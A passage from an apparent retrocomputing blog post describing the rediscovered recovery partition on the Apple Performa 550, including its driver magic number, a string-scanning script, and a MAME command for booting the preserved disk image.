This whole question is the last piece of the puzzle that hasn’t been solved yet. If anyone else has a Performa 550 and would be willing to dump their hard drive or at least look at Apple Backup, I’d be very interested in finding out A) if it has the recovery partition and B) if there was a special newer version of Apple Backup that didn’t make its way onto the Performa CD. I searched for various strings that show up in the “recovery” and “Read Me Mini System Folder” apps, and they aren’t anywhere on the Performa CD. I guess they could be stored compressed somewhere, but I’m pretty confident based on the actual Apple Backup code that nothing is hiding in there. Here are the various versions (with their exact sizes and dates) of Apple Backup that I have seen on Performa 550 installations. None of these have the recovery partition creation built in:
I also found version 1.3 (June 15, 1994, 163,388 bytes used) by restoring from a Performa 636 restore CD. It, too, does not contain any recovery partition code.
For a demo, I thought it would be fun to replicate the problem that the Apple tech note mentioned about the Dinosaur Safari CD inadvertently activating the recovery partition, so I bought a copy to test it out. To make it even more interesting, I decided to run this test on real hardware. I’m leaning toward believing that a lot of the older caddy-loading models (possibly all of them) didn’t have this recovery partition, so just pretend my caddy-loading test machine is a newer model that came with System 7.1P6. I copied the recovery partition onto a real Apple-branded IBM 160 MB SCSI hard drive using ZuluSCSI’s USB MSC initiator mode, which allows it to act as a USB-to-SCSI bridge. Sorry about the flickery screen; I couldn’t get my phone camera’s shutter speed to sync up perfectly with the display’s refresh rate.
Sure enough, when I opened the game from the CD, the computer did exactly what Apple’s tech note said it would do. The workaround of copying the application to my hard drive worked just fine. If it’s not obvious, I sped up the process of copying it to the hard drive — it took a while! It might be interesting someday to look into why this game accidentally activated the OS recovery, but this blog is already getting way too long!
I want to talk a little more about the yellow screen of shame. When I first saw it, I wasn’t entirely sure if it was really part of the recovery functionality or if the original owner just had terrible taste.
Digging deeper, I found three clues that all made it clear it was an intentional choice by Apple to really make it obvious that something was wrong. First, the yellow pattern is stored as a ‘ppat’ resource in the recovery app.
Second, the System file in the recovery partition has the default blue-gray Performa background shown in the screenshots above. This makes sense, because it’s the pattern that showed up with the dialog about the Performa having trouble starting up.
And lastly, page 3 of the Read Me app implies that something may have changed your desktop pattern.
So clearly, the recovery process, by design, sets up the custom yellow background.
Why did I care so much about finding this lost partition? Well, there are a number of reasons. For one, this is exactly the kind of research project that’s perfect for me because I don’t know how to let things go. It’s also something that, quite frankly, needed to be preserved before it became extinct. The most important reason, though, is that this functionality is historically significant and deserves some attention. How many personal computers in 1994 still had the ability to boot after the OS was trashed? Isn’t this an extremely early example of this type of functionality? Did Windows have anything like this prior to Vista? Did the Mac have anything else like this prior to sometime in the OS X era? I would love to hear more comments about what you think on this. I admittedly don’t know a ton about older machines that weren’t Macs.
I’m not saying this feature is perfect. Since we’ve already seen that the Dinosaur Safari CD was able to accidentally activate it, I wouldn’t be surprised if there were other ways to inadvertently cause it to pop up too. It also required manual intervention after the recovery process, which meant that you needed a fair amount of computer knowledge to finish fixing your OS. The average Joe Schmoe would probably have trouble following these directions to fix the System Folder. But still, it leaves you with a bootable system instead of an unusable computer with a flashing question mark. It’s very cool, especially for 1994.
I wonder why Apple didn’t continue down this path with subsequent models? Or even retroactively add the functionality to earlier ones after a fresh install of a newer OS. I’m not aware of any other Macs that have this partition. It doesn’t depend on any special ROM support or anything like that, at least as far as I can see. I tried out the recovery functionality on several other machines: a IIci, LC, LC 475, and an emulated Performa 600, and it works great on all of them. Heck, it even works on the Classic II/Performa 200!
It kind of looks like the window size of the Read Me app was a calculated decision to ensure it would fit on the 512×342 screen used in black-and-white compact Macs.
Thinking about later models, the Performa 630 series used an internal IDE hard drive instead of SCSI, so the custom version of Apple HD SC Setup was no longer used. I wonder if the Performa 57x series had this partition? You’d think they would have had the exact same software bundle as the tray-loading 550 models. If any readers have a Performa 57x machine, I’d greatly appreciate it if you could check!
How did this functionality actually work under the hood? I haven’t gone too deep into the code (maybe it can be a future post), but I have pieced together a few clues. The “msjy” magic number I talked about earlier definitely plays a part in everything. The special Performa version of Apple HD SC Setup also includes a custom version of Apple’s hard disk driver. This driver contains several references to msjy, so I’m pretty sure that’s what it uses to identify the recovery partition.
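If you want to go magic-number hunting yourself, a dumb string scan over a dump of the driver code is enough to find every occurrence. Here’s a minimal sketch; the file name is just a placeholder for wherever you’ve extracted the driver:

# Sketch: list every occurrence of the 'msjy' magic in a binary dump.
with open("performa_hd_driver.bin", "rb") as f:   # placeholder file name
    data = f.read()
pos = data.find(b"msjy")
while pos != -1:
    print(f"found 'msjy' at offset {pos:#x}")
    pos = data.find(b"msjy", pos + 1)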
I also discovered that the 7.1P4 and 7.1P5 Utilities floppy disks, which were bundled with various Performas, have slightly older custom versions of Apple HD SC Setup: 7.2.1P and 7.2.2P respectively. They also create the recovery partition. The interesting thing about these versions is that it appears Apple accidentally forgot to strip out the debug function names, in both the utility itself and the bundled hard disk driver. They didn’t make this mistake in the original non-Performa 7.2.2 version, and they also didn’t make the mistake in the newer 7.2.2P6 version. Anyway, this is kind of cool, because it tells me the names of functions that look for “msjy” at an offset of 0x9C. Function names in that same area of the driver code include: recvrybootable, confirmminsystem, flushrecoveryflag, recoveryvolexists, and setrecoveryflags. So Apple definitely at least sort of released some of the recovery functionality to the public prior to 7.1P6, despite what their own version history says. And the disk driver is definitely involved in it.
Newer versions of Apple’s disk driver no longer contain the magic number, so at some point they must have abandoned this functionality. In my opinion, it’s a real shame that they ditched it — this could have been very useful going forward on all Macs. They could have even expanded on it and automated more of the recovery process. Sure, it used some of your hard drive space, but it could have been a good trade-off for better reliability.
That’s more than enough technical stuff for one post. I am sharing a download link where you can try this functionality out for yourself if you want. After all, the whole reason I did this was for software preservation purposes, so it makes sense to share it with the world. This is a small piece of Apple software history that, to my knowledge, has not been preserved until now. I uploaded a drive image to the Macintosh Garden. Don’t worry, I didn’t include any of the original owner’s personal data. I started fresh with a blank hard drive image, restored it using the 7.1P6 Performa CD, and then only copied over the recovery partition from the dumped hard drive. So this is a factory-fresh Performa 550 7.1P6 install with the recovery partition also present and populated.
The MAME command that I use to boot from this disk image is:
mame maclc550 -scsi:0 harddisk -harddisk1 Performa550.hda -window -nomaximize -ramsize 32M
Of course, you can also test it out on a real machine by copying the hard drive image to a ZuluSCSI or BlueSCSI and naming it something like HD00.hda.
Winding down this super long post now, the main lessons I learned from this research project are:
...